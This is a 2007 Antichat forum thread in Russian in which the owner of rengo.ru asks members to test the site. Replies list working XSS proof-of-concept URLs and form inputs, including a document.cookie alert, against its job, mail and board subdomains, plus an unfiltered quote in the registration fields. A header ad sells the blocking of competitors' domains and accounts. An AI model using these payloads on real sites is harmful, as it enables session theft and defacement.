Форум АНТИЧАТ - Проверьте портал Rengo.Ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Проверьте портал Rengo.Ru

Опции темы

Поиск в этой теме

Опции просмотра

Проверьте портал Rengo.Ru

29.12.2007, 20:04

evgheni

Новичок

Регистрация: 29.12.2007

Сообщений: 1

Провел на форуме:
14069

Репутация: 0

Проверьте портал Rengo.Ru

Здравствуйте! Кому не сложно, проверьте на уязвимости сайт – http://rengo.ru.
Сайт имеет «самописный» движок, и мы работали над системой безопасности, но все же лучше, если проверят настоящие хакеры.

Сам сайт: http://rengo.ru.
Также просьба проверить его подразделы - http://news.rengo.ru, mail.rengo.ru и т.д.

Спасибо за помощь в поиске уязвимостей!

blackybr ссылка на главной странице есть

Последний раз редактировалось evgheni; 31.12.2007 в 13:53..

31.12.2007, 13:42

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

XSS

Цитата:

http://job.rengo.ru/cgi-bin/vsearch.pl?action=browse&set_search=1&spec=0&city= 138&kwds=<script>alert(document.cookie)</script>&min_sal=200

PS Сорри, не увидел про поддомены)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

31.12.2007, 13:56

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

на mail.rengo.ru
Отправляем письмо, в теме пишем <script>alert(99)</script> - вылетает алерт

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

31.12.2007, 14:28

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

На board.rengo.ru подаём объявление, в заголовке пишем тот же код, у модератора вылетит алерт)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

31.12.2007, 14:29

v1ru$

Постоянный

Регистрация: 17.03.2007

Сообщений: 336

Провел на форуме:
3766085

Репутация: 576

Отправить сообщение для v1ru$ с помощью ICQ

http://job.rengo.ru/cgi-bin/login.pl
xss в логине
http://job.rengo.ru/cgi-bin/usr_reg.pl
xss везде

Код:

http://job.rengo.ru/cgi-bin/story.pl?action=success&page_num=1'%22%3E%3Cscript%3Ealert(99)%3C/script%3E

Код:

http://job.rengo.ru/cgi-bin/vmanager.pl?profession=&spec=68&expert=0&leader=0&min_age=&max_age=&edu=0&gen=N&work_place=0&city=1&metro=0&metrotime=0&city2=&min_sal=&max_sal=&work_type=0&work_graf=0&duty=&demand=&condition=&descr=&org=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&sphere=2&cont_name=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&phone_country=7&phone_code=495&phone_main=945646&phone_text=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&code=%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&prior_days=0&home_days=0&preview=%CF%F0%E5%E4%EF%F0%EE%F1%EC%EE%F2%F0&action=addVacancy&set=add

Последний раз редактировалось v1ru$; 31.12.2007 в 14:46..

31.12.2007, 18:33

0nep@t0p

Участник форума

Регистрация: 25.05.2007

Сообщений: 147

Провел на форуме:
2313429

Репутация: 728

Цитата:

на mail.rengo.ru
Отправляем письмо, в теме пишем <script>alert(99)</script> - вылетает алерт

Хотелось бы поправить, там еще пассивки в полях "Скрытая копия:" и "Копия:"

И пассивка в поиске в объявлениях -

Код:

http://board.rengo.ru/search.php?q=%27%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search_region=1

Последний раз редактировалось 0nep@t0p; 31.12.2007 в 19:24..

31.12.2007, 19:30

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

http://board.rengo.ru/register.php?code=2&type=1

не фильтруется ' в полях - Логин: E-mail:

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проверьте besticq плз	Ridikh	Проверка на уязвимости	17	09.02.2008 00:05
Портал МВД удивит под Новый Год	dinar_007	Мировые новости	10	25.12.2005 18:26
портал!!!!	forever777	PHP, PERL, MySQL, JavaScript	7	14.12.2005 16:36

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход